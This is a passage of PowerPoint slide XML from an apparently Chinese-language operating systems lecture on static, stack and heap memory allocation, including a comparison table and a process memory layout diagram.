            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263918" y="3552667"/>
            <a:ext cx="4149438" cy="29030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sz="3600"/>
              <a:t>三种内存分配模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628333" y="1508443"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Heap)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：当进程需要生成实体时，向系统申请分配空间；不再需要该实体时，可以向系统申请回收这块空间。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆分配使用特定的函数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>new()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆分配的空间利用率最高。</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20" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1265237" y="489857"/>
            <a:ext cx="6407150" cy="563563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>三种内存分配模式比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="314432" name="Group 64"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="250825" y="1450975"/>
          <a:ext cx="8435975" cy="4414203"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="22637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74688">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endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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静态分配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栈分配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堆分配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657225">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空间的生成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进程创建时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进程创建时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用一点分配一点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7225">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实体生成时间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进程创建时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进程运行时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进程运行时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7225">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实体生成者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操作系统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进程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进程申请</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>系统实施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7225">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生命期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永久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临时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完全可控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7225">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访问方式</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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标识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标识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chemeClr val="hlink"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>进程内存布局</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317444" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="1628775"/>
            <a:ext cx="0" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="1781175"/>
            <a:ext cx="2133600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317446" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5157788" y="1628775"/>
            <a:ext cx="9525" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317447" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="2619375"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9FFDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317448" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="3762375"/>
            <a:ext cx="2133600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9FFDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317449" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="4143375"/>
            <a:ext cx="2133600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317450" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="4524375"/>
            <a:ext cx="2133600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317451" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3024188" y="4905375"/>
            <a:ext cx="2133600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>text(code)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317452" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5310188" y="1704975"/>
            <a:ext cx="2819400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Adresses hautes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317453" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5386388" y="5362575"/>
            <a:ext cx="2819400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Adresses basses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317454" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5919788" y="2619375"/>
            <a:ext cx="0" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317455" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4090988" y="3000375"/>
            <a:ext cx="0" cy="30480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317456" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4090988" y="3533775"/>
            <a:ext cx="0" cy="304800"/>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317457" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6224588" y="2771775"/>
            <a:ext cx="1143000" cy="1187450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317458" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1271588" y="5362575"/>
            <a:ext cx="1219200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 94403"/>
              <a:gd name="adj2" fmla="val -98810"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>代码区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317459" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2871788" y="4157663"/>
            <a:ext cx="76200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 83333"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317460" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1119188" y="4295775"/>
            <a:ext cx="1219200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 97917"/>
              <a:gd name="adj2" fmla="val -14060"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据区</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317461" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="2162175"/>
            <a:ext cx="1219200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 109505"/>
              <a:gd name="adj2" fmla="val 72917"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
